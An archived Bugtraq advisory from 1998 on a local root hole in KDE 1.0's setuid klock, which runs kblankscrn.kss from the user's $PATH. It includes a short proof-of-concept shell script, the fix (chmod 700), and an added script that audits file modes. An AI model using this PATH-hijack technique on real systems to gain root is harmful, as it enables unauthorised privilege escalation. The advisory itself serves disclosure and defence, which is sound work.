Bugtraq mailing list archives

KDE 1.0's klock can be used to gain root privileges


From: hdmoore () USA NET (HD Moore)
Date: Mon, 16 Nov 1998 19:57:51 -0600


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

--( the problem )--

The SUID program klock shipped with KDE 1.0 attempts to execute
kblankscrn.kss in the same directory as it.  If kblankscrn.kss cannot
be executed (missing or mode -x) then klock will search the current
user's $PATH for any executable with the same name and execute it as
ROOT.  If no executable is found in the current path it gives this
message:

    >Could not invoke kblankscrn.kss in $PATH or /opt/kde/bin

Default modes for klock and kblankscrn.kss are:

-rwsr-xr-x   1 root     root         8760 Mar 12  1998 /opt/kde/bin/klock
-rwsr-xr-x   1 root     root        43600 Mar 12  1998 /opt/kde/bin/kblankscrn.kss

Systems Affected:   any system that runs KDE 1.0
____________________________________________________


--( the exploit )--

This is only exploitable if any of the following occurs:

    1) klock is moved to another directory
    2) kblankscrn.kss is moved to another directory
    3) kblankscrn.kss is not executable

To see if you are vulnerable...

1) as root, chmod 600 /opt/kde/bin/kblankscrn.kss
2) login as a normal user
3) create a shell script that looks like:

        #!/bin/sh
        echo Running script as `whoami`!
        exit

4) name this script kblankscrn.kss and mv it to your home directory.
5) execute /opt/kde/bin/klock; you should see:

    user@hostname:/home/user> /opt/kde/bin/klock
    user@hostname:/home/user> Running script as root!

6) as root, chmod 755 /opt/kde/bin/kblankscrn.kss
____________________________________________________


--( the fix )--

chmod 700 /opt/kde/bin/klock or wait until KDE is updated.
The KDE buglist has been notified.




-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNlDXoa51X44hunVSEQJl2wCgzFbX8KdOfCfOMZGREF5e9H2BGA8An3Qw
UmLBRO0nACQcXreodKkWFrpm
=rKnX
-----END PGP SIGNATURE-----
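The three conditions listed under "the exploit" and the chmod 700 fix can be audited from the file modes alone, without running klock or planting a helper. The script below is an added example written for this archive page; it is not part of HD Moore's post or of KDE. It takes the KDE binary directory as an optional argument (defaulting to /opt/kde/bin, the path in the advisory); the argument and the exit codes are assumptions made here so the check can be pointed at a different install prefix.

```shell
#!/bin/sh
# Added audit helper for the klock PATH-fallback issue; not part of the
# advisory or of KDE. It only inspects file modes and executes nothing.
# Usage: sh klock_audit.sh [/path/to/kde/bin]
# Exit status (assumed convention): 0 = not exploitable, 1 = exploitable,
# 2 = klock not found in the given directory.

klock_audit() {
    dir="${1:-/opt/kde/bin}"          # /opt/kde/bin comes from the advisory
    klock="$dir/klock"
    kss="$dir/kblankscrn.kss"

    if [ ! -e "$klock" ]; then
        echo "klock: not found in $dir (nothing to audit)"
        return 2
    fi

    # The advisory's fix, chmod 700, clears the setuid bit. Without it
    # klock runs as the caller, so the \$PATH lookup no longer executes
    # anything as root.
    if [ ! -u "$klock" ]; then
        echo "klock: no setuid bit, PATH lookup runs as the caller: not exploitable"
        return 0
    fi

    # Conditions 2 and 3 from the advisory: helper missing from klock's own
    # directory, or present but not executable. In both cases klock falls
    # back to searching the user's \$PATH. The -x test reflects the auditing
    # user's view; run the audit as root to see exactly what setuid klock sees.
    if [ ! -e "$kss" ]; then
        echo "klock is setuid and $kss is missing: EXPLOITABLE (PATH fallback)"
        return 1
    fi
    if [ ! -x "$kss" ]; then
        echo "klock is setuid and $kss is not executable: EXPLOITABLE (PATH fallback)"
        return 1
    fi

    echo "klock is setuid, $kss present and executable: not exploitable via PATH"
    return 0
}

# Audit the directory given on the command line when run as a script.
[ $# -eq 0 ] || klock_audit "$@"
```

Condition 1 from the advisory (klock moved elsewhere) is covered by pointing the script at the directory klock now lives in: the helper is then checked in that same directory, which is where klock looks first.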